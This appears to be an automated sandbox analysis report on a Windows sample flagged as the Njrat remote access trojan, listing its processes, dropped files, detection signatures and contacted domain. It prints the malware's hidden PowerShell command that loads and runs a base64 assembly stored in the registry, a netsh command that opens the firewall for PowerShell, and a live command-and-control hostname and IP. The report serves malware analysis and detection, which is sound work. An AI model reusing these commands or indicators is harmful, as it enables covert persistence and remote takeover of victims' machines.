Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min powershell -executionpolicy bypass -windowstyle hidden -noexit -command [system.reflection.assembly]::load([system.convert]::frombase64string((get-itemproperty hkcu:\software).valuex)).entrypoint.invoke($null,$null)
Source: unknown Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min powershell -executionpolicy bypass -windowstyle hidden -noexit -command [system.reflection.assembly]::load([system.convert]::frombase64string((get-itemproperty hkcu:\software).valuex)).entrypoint.invoke($null,$null)
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00446124
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B24A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 1_2_00B24A08
Source: Tr.exe, 00000001.00000000.342399628.0000000000B74000.00000002.00000001.01000000.00000005.sdmp, Tr.exe, 0000000C.00000002.411310595.0000000000454000.00000002.00000001.01000000.00000005.sdmp, Tr.exe.0.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: powershell.exe, 00000004.00000002.880711036.000000001B7AC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.872864488.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: Tr.exe Binary or memory string: Shell_TrayWnd
Source: powershell.exe, 00000004.00000002.880078674.000000001A824000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerb
Source: powershell.exe, 00000004.00000002.880711036.000000001B7AC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Program Manager
Source: powershell.exe, 00000004.00000002.872864488.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager8
Source: powershell.exe, 00000004.00000002.880711036.000000001B775000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <Program Manager
Source: ._cache_1.exe, x.exe.0.dr Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE87AB cpuid 1_2_00AE87AB
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\._cache_1.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW, 0_2_004720DB
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00472C3F GetUserNameW, 0_2_00472C3F
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 0_2_0041E364
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disables zone checking for all users
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS Jump to behavior
Modifies the windows firewall
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE

Stealing of Sensitive Information
barindex
Yara detected Njrat
Source: Yara match File source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTR
OS version to string mapping found (often used in BOTs)
Source: Tr.exe Binary or memory string: WIN_81
Source: Tr.exe Binary or memory string: WIN_XP
Source: x.exe.0.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: Tr.exe Binary or memory string: WIN_XPe
Source: Tr.exe Binary or memory string: WIN_VISTA
Source: Tr.exe Binary or memory string: WIN_7
Source: Tr.exe Binary or memory string: WIN_8
Source: Tr.exe.0.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality
barindex
Yara detected Njrat
Source: Yara match File source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_004652BE
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00476619
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 0_2_0046CEF3
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B36399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 1_2_00B36399
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B3685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 1_2_00B3685D
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00416399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 12_2_00416399
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0041685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 12_2_0041685D
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1465120 Sample: ._cache_1.exe Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 55 Snort IDS alert for network traffic 2->55 57 Multi AV Scanner detection for domain / URL 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 12 other signatures 2->61 7 ._cache_1.exe 5 2->7         started        10 cmd.exe 2->10         started        13 x.exe 2 2->13         started        15 cmd.exe 2->15         started        process3 file4 29 C:\Users\user\AppData\Local\Temp\x.exe, PE32 7->29 dropped 31 C:\Users\user\AppData\Local\Temp\Tr.exe, PE32 7->31 dropped 33 C:\Users\user\...\x.exe:Zone.Identifier, ASCII 7->33 dropped 17 Tr.exe 2 7->17         started        63 Suspicious powershell command line found 10->63 65 Bypasses PowerShell execution policy 10->65 20 powershell.exe 1 10 10->20         started        67 Antivirus detection for dropped file 13->67 69 Multi AV Scanner detection for dropped file 13->69 71 Machine Learning detection for dropped file 13->71 23 Tr.exe 13->23         started        25 powershell.exe 15->25         started        signatures5 process6 dnsIp7 39 Multi AV Scanner detection for dropped file 17->39 41 Binary is likely a compiled AutoIt script file 17->41 43 Machine Learning detection for dropped file 17->43 53 2 other signatures 17->53 35 water-boom.duckdns.org 20->35 37 water-boom.duckdns.org 192.169.69.25, 1177, 49162, 49163 WOWUS United States 20->37 45 Disables zone checking for all users 20->45 47 Uses netsh to modify the Windows network and firewall settings 20->47 49 Modifies the windows firewall 20->49 27 netsh.exe 20->27         started        signatures8 51 Uses dynamic DNS services 35->51 process9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.169.69.25
 water-boom.duckdns.org United States
23033 WOWUS true

Contacted Domains

Name IP Active
water-boom.duckdns.org 192.169.69.25 true